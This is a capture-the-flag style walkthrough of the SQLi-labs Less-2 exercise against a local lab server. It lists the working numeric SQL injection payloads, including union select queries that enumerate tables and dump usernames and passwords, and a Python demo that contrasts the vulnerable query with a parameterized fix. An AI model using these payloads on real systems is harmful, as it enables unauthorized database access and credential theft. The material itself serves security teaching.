Less-2 (GET, integer-based)
unkilledsky

Target URL: http://192.168.193.129/sqlilabs/Less-2/

(1) As the challenge indicates, pass an id parameter via GET. Passing id=1 returns data in the response.

(2) Passing id=1' produces an error, so an injection point exists.

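(3) Passing id=1' and 1=1 %23 still produces an error, while id=1 and 1=1 %23 does not and the data is displayed normally. This shows the challenge is an integer-based (numeric) injection.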

(4) Use order by to determine that the number of columns is 3

http://192.168.193.129/sqlilabs/Less-2/?id=1 order by 3 %23

(5) As in the previous challenge, use a union select query to enumerate the database, the tables, and the columns

Determine which columns are displayed: id=0 union select 1,2,3 %23

Query the current database: id=0 union select 1,database(),3 %23

List the tables:

id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' %23

List the columns of the users table:

id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %23

Dump the data in the users table:

id=0 union select 1,group_concat(username),group_concat(password) from security.users %23
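
Why the probes in steps (1) to (5) behave as they do, and how the query is closed to them, shown as an added example that is not part of the original post or the lab's own code. It assumes the page concatenates id unquoted into a `WHERE id=... LIMIT 0,1` clause, uses an in-memory SQLite table with constructed rows in place of the lab's MySQL database, and leaves off the %23 suffix because SQLite accepts the trailing LIMIT as is.

```python
import re
import sqlite3

def make_db():
    # Constructed rows standing in for the lab's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-one"), (2, "bob", "pw-two")])
    return db

def lookup_vulnerable(db, raw_id):
    # Assumed shape of the lab's query: the value lands in a numeric context
    # with no quotes, so whatever follows the number is parsed as SQL.
    return db.execute("SELECT * FROM users WHERE id=" + raw_id + " LIMIT 0,1").fetchone()

def lookup_hardened(db, raw_id):
    # Reject anything that is not a plain decimal integer, then bind the value
    # so it can never be parsed as SQL text.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None
    return db.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (int(raw_id),)).fetchone()

def probe(lookup, raw_id):
    # Run one request against a fresh database; report SQL errors as a string.
    try:
        return lookup(make_db(), raw_id)
    except sqlite3.Error:
        return "SQL error"

# Probes from steps (1), (2), (3) and (5), without the %23 suffix.
PROBES = ["1", "1'", "1 and 1=1", "0 union select 1,2,3"]

if __name__ == "__main__":
    for p in PROBES:
        print(f"{p!r:26} vulnerable={probe(lookup_vulnerable, p)!r} "
              f"hardened={probe(lookup_hardened, p)!r}")
```

The hardened function returns None for every probe except id=1, so neither the error from step (2) nor the union row from step (5) is reachable.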
